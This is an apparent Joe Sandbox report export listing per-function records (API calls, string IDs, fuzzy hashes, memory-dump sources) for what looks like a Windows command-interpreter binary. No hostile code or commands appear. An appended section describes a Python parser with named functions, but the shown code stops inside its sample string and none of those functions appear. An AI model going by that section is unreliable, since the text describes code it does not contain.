• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
• String ID:
• API String ID: 4166807220-0
• Opcode ID: 53941e0059471335514268db7c29fc1fafbd930477c1ef716cc0c41024b60222
• Instruction ID: fb81e62d7355c13bebd57dd058465d35bf8571c4ecfb393e08917218ef736f57
• Opcode Fuzzy Hash: 53941e0059471335514268db7c29fc1fafbd930477c1ef716cc0c41024b60222
• Instruction Fuzzy Hash: 1651A1716002189AEB34AB34DC09BE977EAFF00311F1485A9F486D61D0EF709E85CBA2
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00197669
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00197670
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00197686
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019768D
• _wcsicmp.MSVCRT ref: 00197719
• _wcsicmp.MSVCRT ref: 0019772B
• _wcsicmp.MSVCRT ref: 00197758
• _wcsicmp.MSVCRT ref: 001AAA79
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap_wcsicmp$AllocProcess
• String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                          • API String ID: 435930816-3086019870
                                                                                                                                                                                                                          • Opcode ID: edbb82875f86d8d00938684cf263285c7119456ecab80220b01278f2a2b4d875
                                                                                                                                                                                                                          • Instruction ID: 67ce3dffaa3ca7d43289fc72ffe402117756fa5fd588069ef590c74a1f47ad8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edbb82875f86d8d00938684cf263285c7119456ecab80220b01278f2a2b4d875
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7251363521A3419FDB18DF78EC09A263BD5EF05314B68486EE442C76C1EB61D881CB66
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF04
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF58
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0019250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 001BB08B
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 001BB095
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 001BB0AA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB1DA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB1F2
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB20A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                          • String ID: %04X-%04X
                                                                                                                                                                                                                          • API String ID: 2748242238-1126166780
                                                                                                                                                                                                                          • Opcode ID: bf0aa9c1e2c6f86936d263262f02e10096d95c4351c7bf3bae42ce40fb88a005
                                                                                                                                                                                                                          • Instruction ID: 30334c8e332fcf90ed03e6a4991af27acd69a77fd1ea70f3bb3fc05d5ef7a788
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf0aa9c1e2c6f86936d263262f02e10096d95c4351c7bf3bae42ce40fb88a005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24918EB1A052289BDF24DA28CC95AFAB7B9EF54304F4405E9F509D3140EBB49F848BA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                          • API String ID: 3458554142-1539845467
                                                                                                                                                                                                                          • Opcode ID: a25f8affb98d8910c7c65dfbf531020726bae35b70c40595e88623b944c66b85
                                                                                                                                                                                                                          • Instruction ID: b02c081ff43c96d896b085d79ee2de7d7fb9dd070a24d103fe86ef9e381f6637
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a25f8affb98d8910c7c65dfbf531020726bae35b70c40595e88623b944c66b85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A981CF74904215CBDF349FA4EE857BA73F6AF10709F14446AE94AA7240EB748D84CB61
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A2431
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A2452
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A247C
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,0019250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 001A2585
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001A25A3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001A25CA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001A25E3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001AF32B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$InformationVolume_wcsicmp
                                                                                                                                                                                                                          • String ID: FAT
                                                                                                                                                                                                                          • API String ID: 4247940253-238207945
                                                                                                                                                                                                                          • Opcode ID: d2677a0d468a4628d76a037129911a3a3dcf7f3fe04d66a4415801456cdc8d82
                                                                                                                                                                                                                          • Instruction ID: 716c48b90a061c922cc46ad9c5fb0c9f82f515815ada765fe736c4a9da5408ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2677a0d468a4628d76a037129911a3a3dcf7f3fe04d66a4415801456cdc8d82
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB516FB5D01218ABEF24CBA4DC99BEA77B8FB55305F1400A9E505E3181EB389F84CE25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197381
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 001973D6
                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 001973F9
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00197465
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 001AA8C6
                                                                                                                                                                                                                            • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001AA87E
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 001AA89B
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001AA8DE
                                                                                                                                                                                                                            • Part of subcall function 001A589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?), ref: 001A58BB
                                                                                                                                                                                                                            • Part of subcall function 001A589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A58CD
                                                                                                                                                                                                                            • Part of subcall function 00198B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,001B99FD,00000000,?,00000000,001ACF94,00000000,?), ref: 00198B7B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
• String ID: \\.\
• API String ID: 799470305-2900601889
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$iswspace$_wcsicmp
• String ID: &<|>$+: $=,;
• API String ID: 3089800946-2256444845
APIs
  • Part of subcall function 001BC0F8: free.MSVCRT ref: 001BC116
  • Part of subcall function 001BC0F8: free.MSVCRT ref: 001BC123
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• longjmp.MSVCRT(001D0A30,00000001,00000000,?,00000000), ref: 001BBB97
• qsort.MSVCRT ref: 001BBC1A
• wcschr.MSVCRT ref: 001BBC6F
• calloc.MSVCRT ref: 001BBCB1
• calloc.MSVCRT ref: 001BBD82
• wcschr.MSVCRT ref: 001BBDCB
• memcpy.MSVCRT(00000000,?,?), ref: 001BBE1D
• memcpy.MSVCRT(00000000,?,?), ref: 001BBE3E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 975110957-381716982
APIs
• _tell.MSVCRT ref: 0019B7F9
• _close.MSVCRT ref: 0019B82C
• memset.MSVCRT ref: 0019B8CC
• GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0019B936
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 0019B947
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 0019B96D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ConsoleInfoOutput_close_tellmemset
• String ID: GOTO
• API String ID: 1380661413-1693823284
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 001B6745
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 001B67CF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B67F6
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001920B8,00000000,00000002,?,00000000), ref: 001B6867
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 001B68A3
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B68C5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command$p~du
• API String ID: 4081037667-3069096257
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
• String ID: +-~!
• API String ID: 2191331888-2604099254
                                                                                                                                                                                                                          • Opcode ID: 0e9118e6e5838e070c0feab983ba48021422a8298914ce3d04bcebc0326d6630
                                                                                                                                                                                                                          • Instruction ID: 917607b87572047b69e601092c1d0cff33b8c1f5866df493dea7564d4ed0a357
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e9118e6e5838e070c0feab983ba48021422a8298914ce3d04bcebc0326d6630
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE519079401209EFCB04DF64E945AEB37A5EF06320F15812AFC269B150EBB4DF45DBA1
APIs
• towupper.MSVCRT ref: 001B7277
• iswalpha.MSVCRT ref: 001B72AA
• towupper.MSVCRT ref: 001B72BD
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 001B72EF
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B7304
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B7311
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ErrorLasttowupper$InformationVolumeiswalpha
• String ID: $%04X-%04X$\
• API String ID: 4001382275-467840296
• Opcode ID: 34297c90ceceef9b6ed869f6006ab82807f2617b252ce2388b8fb213080d0ab1
• Instruction ID: 3f76b291a5cc56a9b3f41b672c292dd81b94968aa3647daa3f47f13c1f6683ef
• Opcode Fuzzy Hash: 34297c90ceceef9b6ed869f6006ab82807f2617b252ce2388b8fb213080d0ab1
• Instruction Fuzzy Hash: 5941D971608310AADB24ABA59C0AEBB77ECEFD4B10F44441EF949D61D0E7709940D6B2
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00), ref: 001B6545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6553
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6590
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65AD
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001920B8,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65D4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65EF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s$p~du
• API String ID: 1019019434-193987542
• Opcode ID: 7776d419220933b99359c7afb5957e7a2dfd920c99a414fda60baabcdba0fb39
• Instruction ID: caa973ed55fdcae73249f47115fa621367c75b4e0666a215e1e86b3a81af7e07
• Opcode Fuzzy Hash: 7776d419220933b99359c7afb5957e7a2dfd920c99a414fda60baabcdba0fb39
• Instruction Fuzzy Hash: 1C41E272D01215ABDF31AB55CC09EEF7B78EFA9F90F01011AF80577294D72A5E01CAA0
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,001B3877), ref: 001B2D31
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
• Opcode ID: 8f75f63e60e3e2b0063ab9330888f76b0f5e9eb097a418ffad643db2dc029dd3
• Instruction ID: 8c8fdfbf344350b4ad949115a644a4805245f767f87a608b4958c64cb60053c5
• Opcode Fuzzy Hash: 8f75f63e60e3e2b0063ab9330888f76b0f5e9eb097a418ffad643db2dc029dd3
• Instruction Fuzzy Hash: F731B530305204ABEB249BA2CC89BFB376EEF41351FB04436F912D6690D778CD499662
APIs
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 001B8360
• _ultoa.MSVCRT ref: 001B8376
• GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 001B838B
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 001B83A0
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 001B83D8
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 001B840C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
• String ID: (#$Application$System
• API String ID: 3377411628-593978566
• Opcode ID: 9035a48bccf0a57c8bc05398e181245a6dc50fb3eb48e69a0ed5e1e0cd640ac6
• Instruction ID: 71c4037a698d23600a7892982e8975983a298ee962ad131bd170906928c789aa
• Opcode Fuzzy Hash: 9035a48bccf0a57c8bc05398e181245a6dc50fb3eb48e69a0ed5e1e0cd640ac6
• Instruction Fuzzy Hash: E9314971A00208ABDF10DFB5CC44EEEBBBDEB49B10F50412AF811E7191EB309A45CB61
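The per-function records in this report (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) follow a fixed layout that is easy to copy out of the page but tedious to pivot on by hand. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses that layout into one dict per function and shows two pivots an analyst typically wants: searching for an ordered API call pattern and grouping functions by their Instruction Fuzzy Hash. The sample text is constructed from three records quoted on this page (entry refs 001B7277, 001B650F and 001A5294), shortened; all function and field names (`parse_records`, `find_by_sequence`, `index_by_fuzzy_hash`, the `apis`/`dumps`/`meta` keys) are this example's own choices.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) into dicts, then pivot on them."""
import re
from typing import Dict, List, Optional, Sequence

# Constructed sample: three records quoted from this report (refs 001B7277,
# 001B650F and 001A5294), shortened. Raw string so the trailing backslashes in
# the String ID lines survive. One "Download File" link residue is left in on
# purpose to show that the parser strips it.
SAMPLE = r"""
APIs
• towupper.MSVCRT ref: 001B7277
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 001B72EF
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B7304
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
Similarity
• API ID: ErrorLasttowupper$InformationVolumeiswalpha
• String ID: $%04X-%04X$\
• Instruction Fuzzy Hash: 5941D971608310AADB24ABA59C0AEBB77ECEFD4B10F44441EF949D61D0E7709940D6B2
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00), ref: 001B6545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6553
Similarity
• String ID: %s=%s$p~du
• Instruction Fuzzy Hash: 1C41E272D01215ABDF31AB55CC09EEF7B78EFA9F90F01011AF80577294D72A5E01CAA0
APIs
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A5294
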